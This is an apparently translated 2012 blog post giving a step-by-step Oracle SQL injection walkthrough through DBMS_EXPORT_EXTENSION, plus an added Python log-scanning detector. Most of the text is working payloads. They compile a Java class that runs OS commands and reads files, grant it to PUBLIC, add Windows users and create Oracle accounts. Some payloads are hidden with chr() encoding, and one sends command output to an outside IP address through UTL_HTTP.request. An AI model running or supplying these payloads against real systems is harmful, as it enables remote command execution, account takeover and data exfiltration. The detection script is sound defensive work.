A worked demonstration of the full process of getting a cmdshell via Oracle injection

Posted on 2012-12-18 12:21:48
All of the demonstrations below were run in SQL*Plus over the web. For web injection, change select SYS.DBMS_EXPORT_EXTENSION..... into the form

/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

(The 'a'|| is there so that the statement evaluates to true.)
The statement is fairly long, so it may need to be submitted via POST.
The steps are as follows:
1. Create the package
By injecting into the SYS.DBMS_EXPORT_EXTENSION function, create the Java package LinxUtil in Oracle, containing two functions: runCMD executes system commands and readFile reads files:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
3 ^- Z$ @+ K& [: S1 s4 l& f------------------------
If the URL has a length limit, the readFile() function block can be dropped, i.e.:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
Also drop the statements in the later steps that deal with readFile().
------------------------------
2. Grant Java permissions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. Create the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4. Grant PUBLIC the privilege to execute the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5. Test whether the steps above succeeded
and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
6. Execute commands:
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)

Note that sys.LinxReadFile() returns a varchar, so "and 1<>" cannot be used in place of "and '1'<>".
To see the result of execution, use union:
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
Or UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
)
Note: when using UTL_HTTP.request, the spaces and newlines must be replaced with REPLACE(), otherwise the HTTP request cannot be submitted. utl_encode.base64_encode also works.
--------------------
6. Internal changes
The changes to all_objects can be seen with the following command:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7. Delete the functions we created
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
End of article. This piece is dedicated to my friends.
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
Another way to test the vulnerability:
Create an Oracle account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
That is:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
Confirm that the vulnerability exists:
1<>(
select user_id from all_users where username='LINXSQL'
)
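From the defender's side, the payloads above have a fixed shape in web access logs: a call to SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES wrapping EXECUTE IMMEDIATE / PRAGMA AUTONOMOUS_TRANSACTION, followed by Java-source compilation, dbms_java.grant_permission, or UTL_HTTP.request. The chr()||chr() form shown under "That is:" only hides the keywords from naive string matching. The script below is an added detection example, not part of the original post: it URL-decodes each log line, resolves chr() chains, and reports which of the page's payload keywords appear. The log lines are constructed samples; the signature list is taken from the payloads on this page.

```python
import re
from urllib.parse import unquote_plus

# Keywords lifted from the injection payloads shown on this page.
# Matching is done on an upper-cased, whitespace-collapsed copy of the request.
SIGNATURES = [
    "DBMS_EXPORT_EXTENSION",
    "GET_DOMAIN_INDEX_TABLES",
    "PRAGMA AUTONOMOUS_TRANSACTION",
    "EXECUTE IMMEDIATE",
    "COMPILE JAVA SOURCE",
    "DBMS_JAVA.GRANT_PERMISSION",
    "LANGUAGE JAVA NAME",
    "UTL_HTTP.REQUEST",
]

# A single chr(NNN) call, and a run of them joined by the Oracle concat operator ||.
CHR_ONE = re.compile(r"chr\(\s*(\d{1,3})\s*\)", re.IGNORECASE)
CHR_RUN = re.compile(
    r"chr\(\s*\d{1,3}\s*\)(?:\s*\|\|\s*chr\(\s*\d{1,3}\s*\))*", re.IGNORECASE
)


def decode_chr_chains(text):
    """Replace every chr(a)||chr(b)||... run with the string it encodes."""
    def resolve(match):
        return "".join(chr(int(n)) for n in CHR_ONE.findall(match.group(0)))
    return CHR_RUN.sub(resolve, text)


def normalize(line):
    """URL-decode twice (double encoding is common), resolve chr() chains,
    collapse whitespace and upper-case. Returns (normalized, chr_obfuscated)."""
    decoded = unquote_plus(unquote_plus(line))
    obfuscated = CHR_ONE.search(decoded) is not None
    resolved = decode_chr_chains(decoded)
    return " ".join(resolved.split()).upper(), obfuscated


def scan_line(line):
    """Return the payload signatures found in one access-log line.
    Adds the marker CHR_OBFUSCATION when hits were only visible after chr() decoding."""
    norm, obfuscated = normalize(line)
    hits = [sig for sig in SIGNATURES if sig in norm]
    if hits and obfuscated:
        hits.append("CHR_OBFUSCATION")
    return hits


def scan_log(lines):
    """Return [(line_number, hits), ...] for every line that matched something."""
    findings = []
    for number, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            findings.append((number, hits))
    return findings


# Constructed sample log lines (not real traffic). Line 2 carries the plain
# payload shape; line 3 carries the chr()-encoded third argument, here encoding
# "EXECUTE IMMEDIATE"; lines 1 and 4 are benign requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Dec/2012:12:21:48 +0800] "GET /xxx.jsp?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [18/Dec/2012:12:22:03 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E%27a%27%7C%7C'
    '(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%27FOO%27,%27BAR%27,%27DBMS_OUTPUT%22.PUT(1);'
    'EXECUTE%20IMMEDIATE%20%27%27DECLARE%20PRAGMA%20AUTONOMOUS_TRANSACTION;BEGIN%20EXECUTE%20IMMEDIATE%20'
    '%27%27%27%27begin%20dbms_java.grant_permission(...)end;%27%27%27%27;END;%27%27;END;--%27,%27SYS%27,0,%271%27,0)'
    '%20from%20dual) HTTP/1.1" 500 0',
    '10.0.0.5 - - [18/Dec/2012:12:23:17 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E'
    '(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),'
    'chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||'
    'chr(68)||chr(73)||chr(65)||chr(84)||chr(69),chr(83)||chr(89)||chr(83),0,chr(49),0)%20from%20dual) HTTP/1.1" 500 0',
    '10.0.0.7 - - [18/Dec/2012:12:24:01 +0800] "GET /docs/extension.jsp?id=2 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

The ordinary "where clause" pattern (and '1'<>'a'||(...)) is deliberately not a signature on its own, since it matches far too much legitimate traffic; the Oracle-specific function names and PL/SQL keywords are what separate this payload from noise. Feeding real access logs through scan_log is just a matter of replacing SAMPLE_LOG with the file's lines.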
Give linxsql the CONNECT privilege:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
Delete the account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
The following method creates a function Linx_query() that can execute other statements; on success it returns the number "1". But its privileges are inherited and may be nothing more than PUBLIC's, so it seems of limited use; if you really need it, consider grant dba to the current user:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)